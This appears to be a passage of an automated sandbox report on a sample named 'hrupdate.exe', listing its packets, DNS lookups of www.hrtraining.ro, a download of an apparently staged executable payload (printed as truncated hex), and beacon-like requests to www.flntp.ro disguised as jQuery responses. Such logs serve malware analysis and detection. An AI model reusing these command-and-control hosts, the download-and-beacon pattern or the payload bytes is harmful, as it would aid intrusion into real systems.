                                                              Dec 19, 2024 22:41:51.303981066 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.303987026 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994616985 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994679928 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994700909 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.994714975 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994739056 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.994782925 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.994786978 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994824886 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.994843960 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994895935 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.995062113 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.995073080 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:52.101857901 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:52.101922989 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:52.102009058 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:52.102220058 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:52.102251053 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:53.484822035 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:53.484903097 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:53.485378027 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:53.485409021 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:53.487021923 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:53.487035036 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:54.188194036 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:54.188215971 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:54.188263893 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:54.188277006 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:54.188321114 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:54.188349009 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:54.188473940 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:54.188504934 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:54.307708979 CET49907443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:54.307800055 CET443499073.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:54.307885885 CET49907443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:54.308103085 CET49907443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:54.308140993 CET443499073.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:55.697117090 CET443499073.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:55.697211981 CET49907443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:55.697634935 CET49907443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:55.697663069 CET443499073.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:55.699348927 CET49907443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:55.699362040 CET443499073.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:56.390424013 CET443499073.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:56.390450001 CET443499073.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:56.390516043 CET443499073.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:56.390530109 CET49907443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:56.390530109 CET49907443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:56.390604019 CET49907443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:56.390929937 CET49907443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:56.390968084 CET443499073.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:56.508390903 CET49913443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:56.508424997 CET443499133.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:56.508497000 CET49913443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:56.508758068 CET49913443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:56.508774042 CET443499133.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:57.897278070 CET443499133.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:57.897576094 CET49913443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:57.898175001 CET49913443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:57.898189068 CET443499133.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:57.904182911 CET49913443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:57.904191017 CET443499133.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:58.591764927 CET443499133.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:58.591841936 CET443499133.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:58.591974974 CET49913443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:58.591974974 CET49913443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:58.591993093 CET443499133.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:58.592056036 CET49913443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:58.592269897 CET49913443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:58.592283964 CET443499133.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:58.695657969 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:58.695678949 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:58.695879936 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:58.696105957 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:58.696116924 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:00.275679111 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:00.275861979 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:00.276215076 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:00.276227951 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:00.277911901 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:00.277920008 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:00.970177889 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:00.970238924 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:00.970267057 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:00.970285892 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:00.970303059 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:00.970347881 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:00.970355988 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:00.970397949 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:00.970400095 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:00.970441103 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:00.970793009 CET49919443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:00.970817089 CET443499193.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:01.102102995 CET49926443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:01.102170944 CET443499263.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:01.102267027 CET49926443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:01.102920055 CET49926443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:01.102956057 CET443499263.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:02.489372015 CET443499263.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:02.489443064 CET49926443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:02.489824057 CET49926443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:02.489835978 CET443499263.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:02.491425991 CET49926443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:02.491439104 CET443499263.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:03.186562061 CET443499263.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:03.186579943 CET443499263.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:03.186626911 CET443499263.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:03.186635971 CET49926443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:03.186681032 CET49926443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:03.186681032 CET49926443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:03.186928988 CET49926443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:03.186956882 CET443499263.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:03.305350065 CET49932443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:03.305381060 CET443499323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:03.305459023 CET49932443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:03.305672884 CET49932443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:03.305685043 CET443499323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:04.712477922 CET443499323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:04.712549925 CET49932443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:04.713054895 CET49932443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:04.713058949 CET443499323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:04.714768887 CET49932443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:04.714775085 CET443499323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:05.412246943 CET443499323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:05.412270069 CET443499323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:05.412319899 CET49932443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:05.412328005 CET443499323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:05.412339926 CET49932443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:05.412341118 CET443499323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:05.412379026 CET49932443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:05.412697077 CET49932443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:05.412707090 CET443499323.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:05.528827906 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:05.528851986 CET443499383.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:05.529028893 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:05.529407978 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:05.529423952 CET443499383.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:07.097789049 CET443499383.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:07.098087072 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:07.098407030 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:07.098413944 CET443499383.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:07.100737095 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:07.100743055 CET443499383.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:07.799652100 CET443499383.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:07.799706936 CET443499383.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:07.799736023 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:07.799746037 CET443499383.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:07.799803972 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:07.799803972 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:07.799818039 CET443499383.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:07.799870014 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:07.799873114 CET443499383.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:42:07.799957037 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:07.800029039 CET49938443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:42:07.800038099 CET443499383.79.209.76192.168.2.4

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 19, 2024 22:40:02.703282118 CET6072953192.168.2.41.1.1.1
                                                              Dec 19, 2024 22:40:03.265650988 CET53607291.1.1.1192.168.2.4
                                                              Dec 19, 2024 22:40:07.812637091 CET6537953192.168.2.41.1.1.1
                                                              Dec 19, 2024 22:40:07.951809883 CET53653791.1.1.1192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 19, 2024 22:40:02.703282118 CET192.168.2.41.1.1.10xe696Standard query (0)www.hrtraining.roA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 22:40:07.812637091 CET192.168.2.41.1.1.10x3238Standard query (0)www.hrtraining.roA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 19, 2024 22:40:03.265650988 CET1.1.1.1192.168.2.40xe696No error (0)www.hrtraining.roec2-3-79-209-76.eu-central-1.compute.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 22:40:03.265650988 CET1.1.1.1192.168.2.40xe696No error (0)ec2-3-79-209-76.eu-central-1.compute.amazonaws.com3.79.209.76A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 22:40:07.951809883 CET1.1.1.1192.168.2.40x3238No error (0)www.hrtraining.roec2-3-79-209-76.eu-central-1.compute.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 22:40:07.951809883 CET1.1.1.1192.168.2.40x3238No error (0)ec2-3-79-209-76.eu-central-1.compute.amazonaws.com3.79.209.76A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.flntp.ro
                                                              • www.hrtraining.ro

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.4497303.79.209.76807428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 19, 2024 22:40:03.390789986 CET57OUTGET /trakingu/user HTTP/1.0
                                                              Host: www.hrtraining.ro
                                                              Dec 19, 2024 22:40:04.711673021 CET321INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 162
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.4497313.79.209.76807428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 19, 2024 22:40:05.320007086 CET62OUTGET /trainingcheck_v5498 HTTP/1.0
                                                              Host: www.hrtraining.ro
                                                              Dec 19, 2024 22:40:06.615403891 CET1236INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:06 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 278025
                                                              Last-Modified: Mon, 04 Nov 2024 13:31:08 GMT
                                                              Connection: close
                                                              ETag: "6728cc9c-43e09"
                                                              Accept-Ranges: bytes
                                                              Data Raw: 90 90 90 90 90 90 90 90 90 4d 5a 52 45 e8 00 00 00 00 5b 89 df 55 89 e5 81 c3 e3 ba 00 00 ff d3 68 f0 b5 a2 56 68 04 00 00 00 57 ff d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 af ba e0 52 13 9e cc 0e 84 15 0a 33 f1 4c 79 ae a8 e7 72 2c 30 7b a4 b7 23 50 7f 8f 4d 94 b9 2f 67 54 df 12 db b4 48 7a ec 0f 66 bd 63 0e 7d f4 17 64 c4 e6 57 80 fe 45 10 20 f6 ed 9f c8 be f6 75 c4 f1 dc 8b 05 34 bc 0b ad 20 fc 3b 8c 77 d1 d7 1a 65 87 ae a1 37 ff 4d 63 75 ac 19 42 e3 45 70 fd f5 ca 3e 21 14 91 1c 54 e8 71 d2 3f 98 89 d2 bc f1 74 36 25 a2 3b b8 c4 16 42 0e d2 1d a7 b3 c1 eb f8 7f 27 2e 7f bf 4b e7 8c 15 98 b0 97 f3 82 0f 98 a6 d2 15 37 d3 e0 43 a2 a6 84 b8 60 dd 57 8d 8c ce a0 b6 aa 79 c2 72 6b 07 98 5d 83 4e 4f 00 00 4c 01 04 00 40 44 25 58 00 00 00 00 0b e2 0e 71 e0 00 03 31 0b 01 09 00 00 c4 02 00 00 f8 01 00 00 00 00 00 c0 ed 09 00 00 10 00 00 00 e0 02 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 47 00 00 04 00 00 00 [TRUNCATED]
                                                              Data Ascii: MZRE[UhVhWR3Lyr,0{#PM/gTHzfc}dWE u4 ;we7McuBEp>!Tq?t6%;B'.K7C`Wyrk]NOL@D%Xq1 G@{Qjd0(%kU `%j!@@%oj4f@%kd"$@B2DV}6]QO")22gb=Vs>)1Uf)TbPg~`f<*AY!Rt%By~3R=NOY;#yXG9#iz:gZ}K5v;B\(]D'd#2Lpc.=/Z_%"DR2I9KI}bh{.brn#/\l?J\)<-tevr|d+$#/`/
                                                              Dec 19, 2024 22:40:06.615467072 CET1236INData Raw: 5c 99 5d 82 0a a3 45 b1 3e 3c 15 7c c8 7f e2 f0 09 a1 3c 6c d6 66 d5 66 fe 81 82 e5 87 89 51 e2 f7 53 2c e8 c6 00 03 18 6d c6 69 2c 14 ac 12 2f ce 0a 58 17 47 87 18 00 00 00 00 5d b5 b7 21 0a e2 0e fa fb 5d e6 01 0f f2 fd d4 54 25 0b 91 7b e6 1e
                                                              Data Ascii: \]E><|<lffQS,mi,/XG]!]T%{p/'87H&2qX$(Kqi~{Vk{qJqqDa&ay{u0z'Zk_y80L(k_e{z*q&
                                                              Dec 19, 2024 22:40:06.615503073 CET448INData Raw: c7 0e 71 52 bb e5 62 61 e2 f1 04 1b 1d 7b 7d f4 97 06 99 76 1d f1 8e 88 26 1e 28 56 21 e6 d0 24 e2 0e 54 f5 1d f1 0e c8 b7 85 9d 88 0e 4a 22 5d b5 66 99 2f e2 0e 99 60 68 0e 71 80 12 c9 75 2f e2 0f 71 0b b4 e6 53 87 e2 0e ce 8b e2 0e 71 5c b4 87
                                                              Data Ascii: qRba{}v&(V!$TJ"]f/`hqu/qSq\4dQ]kKqak(:4(.qaWN4dY]kK"q.nXVaRqC(uUhcq2;{uK(qd7
                                                              Dec 19, 2024 22:40:06.615750074 CET1236INData Raw: 88 0f 1b 0f bb e6 14 c0 e2 0e 21 5d 0a 00 74 0a e2 8d b5 1f 88 0a 28 e3 b1 c5 71 0b b2 58 99 6c 65 0e 71 88 87 ea 71 61 c7 57 99 4b 29 0e 71 82 a7 da fc 4e 06 5e 99 22 e5 0f 71 88 26 02 f4 cb 96 2e fc 4e 22 5e 8e 1e ca ec 73 1b ed b9 34 cb 8b ce
                                                              Data Ascii: !]t(qXleqqaWK)qN^"q&.N"^s4a,\q[W4vd|RkKqasig+oK[Y~)qW^(qR(q(%3qBiK8BN65~={0,zQ!&N"gq&I(q
                                                              Dec 19, 2024 22:40:06.615801096 CET1236INData Raw: e2 83 35 3b a6 5e 99 23 43 0f 71 88 26 02 1b 4b 6f 4b d5 5b 43 e2 c5 0f f2 85 f9 1b fd 0e 71 62 2b f6 71 0b e2 83 f5 0a 26 0e 71 0b b2 e6 70 aa e3 0e d0 e7 56 0a 61 88 26 02 8e 8b f2 11 71 0b 6f 4b 95 63 e2 0c 71 0b b2 e6 55 06 e2 0e 8e 7e ee 83
                                                              Data Ascii: 5;^#Cq&KoK[Cqb+q&qpVa&qoKcqU~4~4-Nda[_|q^N^0qg*^N^Wq!!qaIa4s^N!ja}!qQ/P+P[aeXYNfq+!`q{y
                                                              Dec 19, 2024 22:40:06.616265059 CET1236INData Raw: e2 0e fa 3e 0e ba 75 1b 61 ca 49 e0 e8 83 3e f4 69 d9 99 40 1c f1 8e 4c d9 b0 61 14 e2 0e 0d e6 69 88 61 14 e2 0e 39 e3 bb f0 8e f4 1d 80 61 14 e2 0e fa 85 f6 11 71 0b 69 88 61 14 e2 0e f4 c2 96 1a 4a c0 9c 0d 38 e0 e5 35 b9 77 eb 83 39 f4 6b 80
                                                              Data Ascii: >uaI>i@Laia9aqiaJ85w9keHq9dnqq] oK4q4x^&N^qRP*!#BkFiC9/kF]>B8Gq]'\qgRX!
                                                              Dec 19, 2024 22:40:06.616297960 CET1236INData Raw: 61 73 61 0c b1 58 26 cc a7 f6 18 0b e2 0e 04 0c 25 4b 89 63 e2 0e 71 63 62 0e 71 0b 6f 8b 15 f4 1d f1 1b 0b b2 e6 40 19 e0 0e f2 cf ee 64 0e f4 97 06 fc b6 86 f1 8e f4 0a d5 0d 0b e2 57 28 8e 22 7b 61 61 e7 f1 04 f3 0a 5f 64 0b e2 57 98 04 e3 0e
                                                              Data Ascii: asaX&%Kcqcbqo@dW("{aa_dWquizua_jiaBgnoF5~o4g~ Xp~O0M~=;NqIJ*iqasao6q5qvdpoKcq
                                                              Dec 19, 2024 22:40:06.616331100 CET1236INData Raw: b2 f1 04 03 23 e9 79 00 33 05 86 82 97 02 f8 5e f2 e6 79 0b e2 0e f2 cf ee 51 2f 50 bf cd 24 80 0e 58 fa 7e ea 85 37 07 c9 48 79 5c 69 73 61 30 1a 73 68 8e 1d 7a 64 5c 1d 7b 7d f4 94 0a 99 5f 19 0f 71 0a 9c 0a f2 cf ee 0f 0f 03 bd 50 2c c8 b7 85
                                                              Data Ascii: #y3^yQ/P$X~7Hy\isa0shzd\{}_qP,!OwqRuX~?@y0#sh! vq7S^i'}dq=SK$4<gk,iKyV[a}X=fqkKN4
                                                              Dec 19, 2024 22:40:06.617117882 CET1236INData Raw: e2 2f 96 0b f2 c9 f7 ab e2 0e 71 d2 ef 0f 61 cc 64 aa 71 0b e2 e7 86 0b f2 c9 f7 a3 e2 0e 71 0f 1a 0e 61 cc 64 a2 71 0b e2 94 88 0b f2 c9 f7 bb e2 0e 71 be 1b 0e 61 cc 64 ba 71 0b e2 5c 8a 0b f2 c9 f7 b3 e2 0e 71 4f 1e 0e 61 cc 64 b2 71 0b e2 f8
                                                              Data Ascii: /qadqqadqqadq\qOadqqadqqq3adqJsq+adqtqadqvqadq|qvaU![[h{~riri^y(p %4
                                                              Dec 19, 2024 22:40:06.617155075 CET1236INData Raw: b3 66 71 0b e6 0e 8e 1e 7e ef 73 1b 41 3a 07 0f f2 8b b1 7f d6 f1 44 3b 94 0a 61 61 e2 5e 8e 1e 5a ef 73 1b 09 10 1b 20 bb e6 4f a5 e2 0e 7e bc 22 5e 19 0b d2 0e 71 5c 88 0e 1b 0b 0a 7c b5 0b e2 8d b5 1f 41 22 07 0f f2 af 5d 7d e6 1e f4 cb 97 1c
                                                              Data Ascii: fq~sA:D;aa^Zs O~"^q\|A"]}Pxu%H-qasakH=T'aa+A}q}Gh7GkHu!7Oa}$=Mg?7Gx}%^3qBrkH}1riHi"pE[iH=r
                                                              Dec 19, 2024 22:40:06.740560055 CET1236INData Raw: d1 c7 21 4a 0a 0d 71 0b e2 57 2c c8 b7 85 9d 80 a4 0a 26 86 de 06 4a 75 ea 71 53 5a 69 00 8e 7e ea 0d b9 5a 0a fc 9d 0a e2 87 0f 0f 61 ca 7d 88 25 f6 26 e3 c7 62 73 0b 69 00 f8 4a e6 51 2c c8 69 4e 75 88 22 0a b2 63 0d b0 71 0b 0a 0e 1d 09 e2 85
                                                              Data Ascii: !JqW,&JuqSZi~Za}%&bsiJQ,iNu"cq7![a}XaA]gRgiKeBK&]iv~{yf&Q"poqiCeU^iYoG[oJUH^O!


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.4497323.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:09 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:10 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:09 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:10 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.4497333.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:11 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
